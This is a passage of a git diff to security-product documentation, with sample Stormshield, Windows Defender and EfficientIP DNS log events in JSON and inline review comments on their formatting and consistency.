"{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0BF}", + "IdentifierGuid": "{5C079068-7641-4C9A-8600-BBDC93FBBCDD}", + "Blocked": false, + "UserDecision": false, + "SourceProcessKilled": false + }, + "Path": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements\\25000004", + "ValueName": "Element", + "ValueDataType": 3, + "ValueDataTypeComputedMap": "REG_BINARY", + "ValueData": [ + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0 + ] + }, + "AdditionalData": { + "AgentAddresses": [], + "AgentGroupGuid": "{61B578F4-289D-4B97-A331-DDDCB80C6427}", + "AgentGroupName": "Desktop", + "AgentGuid": "{6EF8564D-941A-4377-80FD-78CD3DFEB269}", + "AgentName": "DST-001", + "CategoryName": "Registry", + "IncidentGuid": null, + "Message": "The'svchost.exe'processcreatedtheregistryvalue'Element'", + "PolicyName": "Stormshield-Mediumpolicy-External", + "SeverityName": "Notice" + } + } + ``` + + + === "test_type_114" 
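Review bot: in the `test_type_113_1` hunk the sample has had its spaces stripped and is internally inconsistent, so it does not show the real field formats: `VolumeZoneComputedBitMap` is "Operatingsystem", `IssuerCN` is "MicrosoftWindowsProductionPCA2011", `PolicyName` is "Stormshield-Mediumpolicy-External", and `Message` is "The'svchost.exe'processcreatedtheregistryvalue'Element'", while `ProcessImageName` on the same event is `C:\Windows\regedit.exe` (PID 1196). Compare `test_type_104_2`, where the same fields keep their spaces and the Message names the same process as `SourceProcess`. Suggest regenerating this tab from an unmodified event, or at least restoring the whitespace and aligning the Message with `regedit.exe`. Also, the `Action` object here has no `RequestMoveToQuarantine` key although the other Version 1 samples carry it; if the key is optional on audit events (`AttributesComputedBitMap: ["Audit"]`, `GenerateIncident: false`), say so, since parsers and rules must not assume it is present.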
@@ -901,6 +1105,113 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_114_2" + + + ```json + { + "Version": 1, + "Type": 114, + "TypeComputedMap": "RegistryValueRead", + "Severity": 2, + "ServerReserved": 0, + "Attributes": 2, + "AttributesComputedBitMap": [ + "Protection" + ], + "EventGuid": "{002A9967-5EF2-40CF-911D-7DBA518843A9}", + "GenerateIncident": true, + "Timestamp": "2024-07-09T12:33:11.2491955+02:00", + "TimestampRaw": 133649947912491955, + "SpecificData": { + "SourceProcess": { + "PID": 3948, + "ProcessGuid": "{9BC994D7-904B-4C9C-8DC0-A03A36F36276}", + "ProcessImageName": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "VolumeZone": 1, + "VolumeZoneComputedBitMap": [ + "Operating system" + ], + "ProcessCommandLine": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "User": "S-1-5-21-2222222-33333333-44444444-555", + "UserNameLookup": "JOHNDOE", + "UserDomainLookup": "TEST", + "IntegrityLevel": "S-1-16-16384", + "IntegrityLevelNameLookup": "Niveau obligatoire syst\u00e8me", + "IntegrityLevelDomainLookup": "\u00c9tiquette obligatoire", + "SessionID": 0, + "HashMd5": "4A4D6E95B693256BCD6E90FDC077194A", + "HashSha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "HashSha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "IsProtectedOrCritical": true, + "CertificateSignatureState": 1, + "CertificateSignatureStateComputedMap": "SignatureStateTrusted", + "Certificates": [ + { + "Algorithm": "SHA256", + "IssuerCN": "Microsoft Windows Production PCA 2011", + "SubjectCN": "Microsoft Windows Publisher", + "SigningTime": "2024-05-11T03:15:15.5120000+02:00", + "ValidityStart": "2024-02-08T21:22:45.0000000+02:00", + "ValidityEnd": "2025-02-07T21:22:45.0000000+02:00" + } + ], + "ProcessStartTime": "2024-07-09T10:03:54.4154623+02:00", + "ProcessStartTimeRaw": 133649858344154623 + }, + "Action": { + "PolicyGuid": 
"{DDAB1006-337F-4B8C-8486-E5A9619144BB}", + "PolicyVersion": 14, + "RuleGuid": "{4FAC2120-288B-4B3C-9F77-2E5B6ECBB85E}", + "BaseRuleGuid": "{49A8528E-E749-4A9D-8736-2CF9380DE241}", + "IdentifierGuid": "{0B7EF8C7-FAE0-4890-981A-22FE12F22173}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false, + "RuleTags": [ + "T1562.001" + ] + }, + "Path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes", + "ValueName": "C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe" + }, + "AdditionalData": { + "AgentAddresses": [ + "1.2.3.4" + ], + "AgentGroupGuid": "{8AD24A5D-0B19-45E2-9B28-F584F8A54CBC}", + "AgentGroupName": "Demo", + "AgentGuid": "{CC0772D7-8EBC-4EE6-9FC0-A8B26F5FA7FF}", + "AgentName": "WIN10-A", + "AttackCVEId": null, + "AttackMitreTacticId": [ + "TA0005" + ], + "AttackMitreTacticName": [ + "Defense Evasion" + ], + "AttackMitreTechnicId": [ + "T1562", + "T1562.001" + ], + "AttackMitreTechnicName": [ + "Impair Defenses", + "Disable or Modify Tools" + ], + "AttackSESId": null, + "AttackTriggerCondition": "An untrusted process attempts to add bypass into Windows Defender.", + "CategoryName": "Registry", + "IncidentGuid": "{DA0FA4D3-76B8-4EE0-A8B7-5AFDF9F80071}", + "Message": "The 'MsMpEng.exe' process read the registry value 'C:\\Program Files\\Stormshield\\SES Evolution\\Agent\\Bin\\EsInject.exe'", + "PolicyName": "Demo - Protect policy", + "SeverityName": "Critical" + } + } + ``` + + + === "test_type_115" 
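Review bot: in the `test_type_114_2` hunk the anonymised GUIDs no longer line up with `test_type_104_2`, which hides exactly the correlation keys a reader should learn from two events of the same process: both samples have `PID: 3948`, the same `ProcessStartTime` (2024-07-09T10:03:54.4154623+02:00) and the same hashes, yet `ProcessGuid` differs ({93158E40-...} vs {9BC994D7-...}); `PolicyName: "Demo - Protect policy"` at `PolicyVersion: 14` appears under two `PolicyGuid` values ({2042076D-...} vs {DDAB1006-...}), and `AgentName: "WIN10-A"` under two `AgentGuid` values ({6CA7D1BE-...} vs {CC0772D7-...}). If GUIDs are rewritten for publication, rewrite them consistently across samples so that `ProcessGuid`, `AgentGuid` and `PolicyGuid` visibly remain stable identifiers for joining events. The same content caveat as for `test_type_104_2` applies: a trusted `MsMpEng.exe` reading `Exclusions\Processes` for the SES agent's own `EsInject.exe` is rated Critical under the "untrusted process" rule text.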
@@ -2914,6 +3225,145 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_type_20048_1" + + + ```json + { + "Version": 1, + "Type": 20048, + "TypeComputedMap": "External", + "Severity": 4, + "ServerReserved": 0, + "Attributes": 32, + "AttributesComputedBitMap": [ + "External" + ], + "EventGuid": "{5838A063-4210-4268-ADB0-39FC5B55A212}", + "GenerateIncident": false, + "Timestamp": "2024-03-22T14:01:26.6589969+00:00", + "TimestampRaw": 133555896866589969, + "SpecificData": { + "Action": { + "PolicyGuid": "{DFDA0F76-10AF-4615-B093-7AA46CC2E7A3}", + "PolicyVersion": 5, + "RuleGuid": "{63B63F11-7C06-4555-9542-3F7E795B98EE}", + "BaseRuleGuid": "{9B076C45-6373-4A4E-9310-F139A66794B4}", + "IdentifierGuid": "{00000000-0000-0000-0000-000000000000}", + "Blocked": false, + "RequestMoveToQuarantine": false, + "UserDecision": false, + "SourceProcessKilled": false + }, + "Description": "localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken", + "OriginType": 2, + "ExtraData": { + "_SourceCategory": 0, + "_HideFromUsers": 1, + "_OriginalText": "2024 Mar 22 14:01:25 WinEvtLog: Microsoft-Windows-Windows Defender/Operational: INFORMATION(1117): Microsoft-Windows-Windows Defender: SYSTEM: NT AUTHORITY: DESKTOP-001: Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. 
For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0 \tName: Trojan:Win32/BatTamper.A \tID: 2147818424 \tSeverity: Severe \tCategory: Trojan \tPath: file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048 \tDetection Origin: Internet \tDetection Type: Concrete \tDetection Source: Downloads and attachments \tUser: NT AUTHORITY\\SYSTEM \tProcess Name: Unknown \tAction: Quarantine \tAction Status: No additional actions required \tError Code: 0x00000000 \tError description: The operation completed successfully. \tSecurity intelligence Version: AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0 \tEngine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9", + "program_name": "WinEvtLog", + "_NormalizerNames": "syslog-1-date-fmt-4, syslog-1-solaris-progname-1", + "_NormalizerIds": "4, 6", + "_FileType": "windows", + "_ExtractorIds": "1", + "_ExtractorNames": "windows", + "_RuleDescription": "localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken", + "_RuleId": 13, + "_RuleImportedId": 24, + "_RuleKeywords": "windows-defender", + "_RuleLevel": 6, + "__EvtXml": { + "Event": { + "System": { + "Provider": { + "Name": "Microsoft-Windows-Windows Defender", + "Guid": "{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" + }, + "EventID": "1117", + "Version": "0", + "Level": "4", + "Task": "0", + "Opcode": "0", + "Keywords": "0x8000000000000000", + "TimeCreated": { + "SystemTime": "2024-03-22T14:01:25.6359716Z" + }, + "EventRecordID": "613", + "Correlation": {}, + "Execution": { + "ProcessID": "5384", + "ThreadID": "4576" + }, + "Channel": "Microsoft-Windows-Windows Defender/Operational", + "Computer": "DESKTOP-001", + "Security": { + "UserID": "S-1-5-18" + } + }, + "EventData": { + "Product Name": "Microsoft Defender Antivirus", + "Product Version": "4.18.23110.3", + 
"Detection ID": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}", + "Detection Time": "2024-03-22T14:01:20.550Z", + "Threat ID": "2147818424", + "Threat Name": "Trojan:Win32/BatTamper.A", + "Severity ID": "5", + "Severity Name": "Severe", + "Category ID": "8", + "Category Name": "Trojan", + "FWLink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0", + "Status Code": "4", + "State": "2", + "Source ID": "4", + "Source Name": "Downloads and attachments", + "Process Name": "Unknown", + "Detection User": "DESKTOP-001\\Lab", + "Path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048", + "Origin ID": "4", + "Origin Name": "Internet", + "Execution ID": "0", + "Execution Name": "Unknown", + "Type ID": "0", + "Type Name": "Concrete", + "Pre Execution Status": "0", + "Action ID": "2", + "Action Name": "Quarantine", + "Error Code": "0x00000000", + "Error Description": "The operation completed successfully. 
", + "Post Clean Status": "0", + "Additional Actions ID": "0", + "Additional Actions String": "No additional actions required", + "Remediation User": "NT AUTHORITY\\SYSTEM", + "Security intelligence Version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0", + "Engine Version": "AM: 1.1.24020.9, NIS: 1.1.24020.9" + } + } + } + }, + "Fields": { + "_RuleGuid": "{63B63F11-7C06-4555-9542-3F7E795B98EE}", + "_BaseRuleGuid": "{9B076C45-6373-4A4E-9310-F139A66794B4}" + } + }, + "AdditionalData": { + "AgentAddresses": [ + "192.168.0.1" + ], + "AgentGroupGuid": "{8C2850C0-1A73-4CBC-9831-5AA5D1438AF2}", + "AgentGroupName": "Desktop", + "AgentGuid": "{0E6DAED4-3505-4F96-9F8D-55FBC85CA4C7}", + "AgentName": "DESKTOP-001", + "CategoryName": "External", + "IncidentGuid": null, + "Message": "Windows Defender: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.", + "PolicyName": "Lab Policy", + "SeverityName": "Warning" + } + } + ``` + + + === "test_type_20049" diff --git a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md index 1994aafd3c..eb0b004d79 100644 --- a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md +++ b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644.md 
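Review bot: in the `test_type_20048_1` hunk, `Type: 20048` / `TypeComputedMap: "External"` / `CategoryName: "External"` is a generic forwarding envelope and nothing at the top level identifies this as a Defender event; the identity lives in `SpecificData.Description` (`localized:EventForwarding_WinDefender_MalwareProtectionStateMalwareActionTaken`), `ExtraData._RuleKeywords` ("windows-defender") and `ExtraData.__EvtXml.Event.System.Provider.Name` / `EventID` ("1117"). The page should state which of these nested fields the parser exposes, because that is what rules must key on (Type 20048 alone matches every forwarded external event), and note that the `__EvtXml.Event.EventData` keys contain spaces ("Threat Name", "Detection ID", "Action Name"), which affects how they are addressed. Two smaller points: the envelope `Timestamp` (14:01:26.658) is later than `TimeCreated.SystemTime` (14:01:25.635), so the inner time is the detection time; and the `_OriginalText` and `Error Description` string values break across lines in this sample, which, if those are literal newlines rather than `\n` escapes, makes the block invalid JSON.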
@@ -25,14 +25,120 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. 
+ +=== "dns_format_error.json" + + ```json + + { + "message": "DNS format error from 7507:2649:84be:353:95f9:eee1:65e9:44b4#53 resolving ejp.rlcdn.com/AAAA for 1.2.3.4#55198: Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "reason": "Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 55198 + }, + "dns": { + "question": { + "name": "ejp.rlcdn.com", + "registered_domain": "rlcdn.com", + "subdomain": "ejp", + "top_level_domain": "com", + "type": "AAAA" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "ejp.rlcdn.com" + ], + "ip": [ + "1.2.3.4", + "7507:2649:84be:353:95f9:eee1:65e9:44b4" + ] + }, + "server": { + "ip": "7507:2649:84be:353:95f9:eee1:65e9:44b4", + "port": 53 + } + } + + ``` + + +=== "dns_formerr.json" + + ```json + + { + "message": "FORMERR resolving 'api.example.com/AAAA/IN': 1111:2222:3333:4444::1#53", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "type": [ + "info" + ] + }, + "dns": { + "question": { + "class": "IN", + "name": "api.example.com", + "registered_domain": "example.com", + "subdomain": "api", + "top_level_domain": "com", + "type": "AAAA" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "api.example.com" + ], + "ip": [ + "1111:2222:3333:4444::1" + ] + }, + "server": { + "ip": "1111:2222:3333:4444::1", + "port": 53 + } + } + + ``` + === "dns_guardian_answer1.json" ```json { - "message": "Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. 
IN TYPE65 (10.242.101.187) -> NOERROR", + "message": "client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR", "event": { "category": [ "network" @@ -42,13 +148,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:43:39Z", "client": { "address": "10.242.101.27", - "ip": "10.242.101.27" + "ip": "10.242.101.27", + "port": 46671 }, "dns": { - "header_flags": [], "question": { "class": "IN", "name": "meet.google.com.", @@ -60,9 +165,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_code": "NOERROR", "type": "answer" }, - "host": { - "name": "doh-2eu-guardian" - }, "network": { "transport": "udp" }, @@ -80,9 +182,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.242.101.187" - }, - "source": { - "port": 46671 } } @@ -94,7 +193,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47", + "message": "client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47", "event": { "category": [ "network" @@ -104,10 +203,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:44:56Z", "client": { "address": "10.242.101.27", - "ip": "10.242.101.27" + "ip": "10.242.101.27", + "port": 34229 }, "dns": { "answers": [ 
@@ -122,7 +221,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "A" } ], - "header_flags": [], "question": { "class": "IN", "name": "community.efficientip.com.", @@ -134,9 +232,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_code": "NOERROR", "type": "answer" }, - "host": { - "name": "doh-2eu-guardian" - }, "network": { "transport": "udp" }, @@ -154,9 +249,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.242.101.187" - }, - "source": { - "port": 34229 } } @@ -168,7 +260,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Oct 3 18:23:27 doh-2eu-guardian named[74943]: ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", + "message": "ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", "event": { "action": "quarantine", "category": [ @@ -179,7 +271,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-10-03T18:23:27Z", "client": { "address": "37.169.153.147", "ip": "37.169.153.147" @@ -188,9 +279,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "guardian_action": "arming", "guardian_trigger_name": "Suspicious Behavior" }, - "host": { - "name": "doh-2eu-guardian" - }, "observer": { "vendor": "EfficientIp" }, @@ -209,7 +297,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "Oct 3 18:24:28 doh-2eu-guardian named[74943]: DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", + "message": "DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior)", "event": { "action": "quarantine", "category": [ 
@@ -220,7 +308,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-10-03T18:24:28Z", "client": { "address": "37.169.153.147", "ip": "37.169.153.147" @@ -229,9 +316,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "guardian_action": "disarming", "guardian_trigger_name": "Suspicious Behavior" }, - "host": { - "name": "doh-2eu-guardian" - }, "observer": { "vendor": "EfficientIp" }, @@ -245,12 +329,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "dns_guardian_query1.json" +=== "dns_guardian_listlog.json" ```json { - "message": "Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187)", + "message": "List Matched 192.168.1.226#32622: query: www.combatcorner.com IN A (192.168.1.209) {DTP} [phishing,active30]", "event": { "category": [ "network" @@ -260,25 +344,30 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:43:39Z", "client": { - "address": "10.242.101.27", - "ip": "10.242.101.27" + "address": "192.168.1.226", + "ip": "192.168.1.226", + "port": 32622 }, "dns": { - "header_flags": [], "question": { "class": "IN", - "name": "meet.google.com", - "registered_domain": "google.com", - "subdomain": "meet", + "name": "www.combatcorner.com", + "registered_domain": "combatcorner.com", + "subdomain": "www", "top_level_domain": "com", - "type": "TYPE65" + "type": "A" }, "type": "query" }, - "host": { - "name": "doh-2eu-guardian" + "efficientip": { + "list_names": [ + "DTP" + ], + "tag_names": [ + "active30", + "phishing" + ] }, "network": { "transport": "udp" 
@@ -288,30 +377,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "meet.google.com" + "www.combatcorner.com" ], "ip": [ - "10.242.101.187", - "10.242.101.27" + "192.168.1.209", + "192.168.1.226" ] }, "server": { - "ip": "10.242.101.187" - }, - "source": { - "port": 46671 + "ip": "192.168.1.209" } } ``` -=== "dns_guardian_query2.json" +=== "dns_guardian_listlog2.json" ```json { - "message": "Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187)", + "message": "List Matched 192.168.1.226#46937: query: www.dsmqlkdsq.com IN A (192.168.1.209) {DTP,internal_clients}", "event": { "category": [ "network" @@ -321,25 +407,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T13:44:56Z", "client": { - "address": "10.242.101.27", - "ip": "10.242.101.27" + "address": "192.168.1.226", + "ip": "192.168.1.226", + "port": 46937 }, "dns": { - "header_flags": [], "question": { "class": "IN", - "name": "community.efficientip.com", - "registered_domain": "efficientip.com", - "subdomain": "community", + "name": "www.dsmqlkdsq.com", + "registered_domain": "dsmqlkdsq.com", + "subdomain": "www", "top_level_domain": "com", "type": "A" }, "type": "query" }, - "host": { - "name": "doh-2eu-guardian" + "efficientip": { + "list_names": [ + "DTP", + "internal_clients" + ] }, "network": { "transport": "udp" 
@@ -349,30 +437,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "community.efficientip.com" + "www.dsmqlkdsq.com" ], "ip": [ - "10.242.101.187", - "10.242.101.27" + "192.168.1.209", + "192.168.1.226" ] }, "server": { - "ip": "10.242.101.187" - }, - "source": { - "port": 34229 + "ip": "192.168.1.209" } } ``` -=== "dns_named_query.json" +=== "dns_guardian_query1.json" ```json { - "message": "Nov 6 14:06:24 0dl10sds named[14006]: client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2)", + "message": "client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187)", "event": { "category": [ "network" @@ -382,28 +467,22 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:06:24Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "10.242.101.27", + "ip": "10.242.101.27", + "port": 46671 }, "dns": { - "header_flags": [ - "RD" - ], "question": { "class": "IN", - "name": "www.google.com", + "name": "meet.google.com", "registered_domain": "google.com", - "subdomain": "www", + "subdomain": "meet", "top_level_domain": "com", - "type": "A" + "type": "TYPE65" }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { "transport": "udp" }, 
@@ -412,30 +491,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "meet.google.com" ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "10.242.101.187", + "10.242.101.27" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 39897 + "ip": "10.242.101.187" } } ``` -=== "dns_named_query_cd.json" +=== "dns_guardian_query2.json" ```json { - "message": "Nov 6 14:08:18 0dl10sds named[14006]: client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2)", + "message": "client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187)", "event": { "category": [ "network" @@ -445,29 +521,22 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:08:18Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "10.242.101.27", + "ip": "10.242.101.27", + "port": 34229 }, "dns": { - "header_flags": [ - "CD", - "RD" - ], "question": { "class": "IN", - "name": "www.google.com", - "registered_domain": "google.com", - "subdomain": "www", + "name": "community.efficientip.com", + "registered_domain": "efficientip.com", + "subdomain": "community", "top_level_domain": "com", "type": "A" }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { "transport": "udp" }, 
@@ -476,30 +545,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "community.efficientip.com" ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "10.242.101.187", + "10.242.101.27" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 36506 + "ip": "10.242.101.187" } } ``` -=== "dns_named_query_dnssec.json" +=== "dns_https_record.json" ```json { - "message": "Nov 6 14:09:07 0dl10sds named[14006]: client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2)", + "message": "26914:client 1.2.3.4#52283 (cdnjs.cloudflare.com.): answer: cdnjs.cloudflare.com. IN TYPE65 (5.6.7.8) -> NOERROR 205 HTTPS 1 . alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e 205 RRSIG HTTPS 13", "event": { "category": [ "network" @@ -509,27 +575,34 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:09:07Z", "client": { - "address": "10.0.142.4", - "ip": "10.0.142.4" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 52283 }, "dns": { - "header_flags": [ - "RD" + "answers": [ + { + "data": "alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e", + "ttl": 205, + "type": "HTTPS" + }, + { + "data": "HTTPS", + "ttl": 205, + "type": "RSSIG" + } ], "question": { "class": "IN", - "name": "www.google.com", - "registered_domain": "google.com", - "subdomain": "www", + "name": "cdnjs.cloudflare.com.", + "registered_domain": "cloudflare.com", + "subdomain": "cdnjs", "top_level_domain": "com", - "type": "A" + "type": "TYPE65" }, - "type": "query" - }, - "host": { - "name": "0dl10sds" + "response_code": "NOERROR", + "type": "answer" }, "network": { "transport": "udp" 
@@ -539,30 +612,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "related": { "hosts": [ - "www.google.com" + "cdnjs.cloudflare.com." ], "ip": [ - "10.0.142.2", - "10.0.142.4" + "1.2.3.4", + "5.6.7.8" ] }, "server": { - "ip": "10.0.142.2" - }, - "source": { - "port": 49968 + "ip": "5.6.7.8" } } ``` -=== "dns_named_query_tcp.json" +=== "dns_named_query.json" ```json { - "message": "Nov 6 14:04:34 0dl10sds named[14006]: client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2)", + "message": "client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2)", "event": { "category": [ "network" @@ -572,10 +642,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2024-11-06T14:04:34Z", "client": { "address": "10.0.142.4", - "ip": "10.0.142.4" + "ip": "10.0.142.4", + "port": 39897 }, "dns": { "header_flags": [ @@ -591,11 +661,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "type": "query" }, - "host": { - "name": "0dl10sds" - }, "network": { - "transport": "tcp" + "transport": "udp" }, "observer": { "vendor": "EfficientIp" 
@@ -611,9 +678,704 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "server": { "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_1.json" + + ```json + + { + "message": "client @0x7ee2b158 1.2.3.4#50426: updating zone 'test.fr/IN': deleting rrset at 'test.test.fr' AAAA", + "event": { + "action": "deleting", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "rrset at 'test.test.fr' AAAA", + "type": [ + "info" + ] }, - "source": { - "port": 36995 + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 50426 + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "test.fr", + "query": { + "class": "IN" + } + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "dns_named_query_2.json" + + ```json + + { + "message": "client 1.2.3.4#63572 (app.test.com.): answer: app.test.com. IN A (1.2.3.4) -> NOERROR 300 A 1.2.3.4 300 A 1.2.3.4 300 RRSIG A 13 3 300 20240815085545 20240813065545 34505 test.com. xxxxxxxxxxxxx", + "event": { + "category": 